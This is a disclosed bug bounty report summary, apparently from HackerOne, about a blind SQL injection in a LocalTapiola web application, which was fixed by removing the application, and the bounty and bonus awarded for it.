LocalTapiola: SQL Injection on /webApp/lapsuudenturva (viestinta.lahitapiola.fi)

2017-01-21T14:56:00
ID H1:200214
Type hackerone
Reporter 3p1c
Modified 2017-02-10T21:04:08

Description

Issue

The reporter found a blind SQL Injection attack in an application in viestinta.lahitapiola.fi.

Fix

The issue was investigated and found to be valid. The fix was to remove the application as it was not needed.

Reasoning

The reported case was valid and within the scope of the bug bounty program. The issue was fixed and the reporter was awarded with a bounty. The report shows that the whole life cycle of an application must be considered and special care must be taken to ensure that outdated and unnecessary applications are removed in a timely manner.

We have found that the underlying infrastructure and database contained a limited set of non-public customer related information. For this reason, we have decided to award this report with a one time additional bonus awarded in #200214. Fairness and transparency are key in a successful bug bounty program.